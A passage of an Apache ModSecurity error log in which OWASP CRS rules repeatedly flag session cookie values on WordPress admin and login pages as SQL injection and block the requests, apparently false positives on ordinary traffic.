"agIFiw-Qm4vhlWBPlMjnmQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:27.425045 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFiw-Qm4vhlWBPlMjnmQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:28.023237 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFiw-Qm4vhlWBPlMjnmQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:28.357477 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFjA-Qm4vhlWBPlMjnmwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:28.357760 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFjA-Qm4vhlWBPlMjnmwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:28.937885 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFjA-Qm4vhlWBPlMjnmwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:29.125859 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFjQ-Qm4vhlWBPlMjnnAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:29.126144 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFjQ-Qm4vhlWBPlMjnnAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:29.694176 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFjQ-Qm4vhlWBPlMjnnAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:29.792761 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFjQ-Qm4vhlWBPlMjnngAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:29.793041 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFjQ-Qm4vhlWBPlMjnngAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:30.157125 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFjQ-Qm4vhlWBPlMjnngAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:30.505564 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFjg-Qm4vhlWBPlMjnoAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:30.505872 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFjg-Qm4vhlWBPlMjnoAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:30.799531 2026] [security2:error] [pid 1411201:tid 1411247] [client 77.91.101.26:64808] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: accb3498fc23579ee7e3edb1a96304ef||1778519175||1778518815"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIFjvy_GXSWIKeli0sgxwAAAIE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 18:36:30.800487 2026] [security2:error] [pid 1411201:tid 1411247] [client 77.91.101.26:64808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIFjvy_GXSWIKeli0sgxwAAAIE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 18:36:30.802716 2026] [security2:error] [pid 1411201:tid 1411247] [client 77.91.101.26:64808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIFjvy_GXSWIKeli0sgxwAAAIE"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 18:36:31.121753 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFjg-Qm4vhlWBPlMjnoAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:31.360963 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFjw-Qm4vhlWBPlMjnoQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:31.361278 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFjw-Qm4vhlWBPlMjnoQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:32.001071 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFjw-Qm4vhlWBPlMjnoQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:32.300952 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFkA-Qm4vhlWBPlMjnowAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:32.301262 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFkA-Qm4vhlWBPlMjnowAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:32.926061 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFkA-Qm4vhlWBPlMjnowAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:33.609475 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFkVV4kyjgo4bQBUiCKwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:33.609760 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFkVV4kyjgo4bQBUiCKwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.153847 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFkVV4kyjgo4bQBUiCKwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.286316 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFklV4kyjgo4bQBUiCLAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.286754 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFklV4kyjgo4bQBUiCLAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.841413 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFklV4kyjgo4bQBUiCLAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.986139 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFklV4kyjgo4bQBUiCLQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:34.986430 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFklV4kyjgo4bQBUiCLQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:35.349102 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFklV4kyjgo4bQBUiCLQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:35.634197 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFk1V4kyjgo4bQBUiCLwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:35.634482 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFk1V4kyjgo4bQBUiCLwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:36.255895 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFk1V4kyjgo4bQBUiCLwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:37.115779 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] 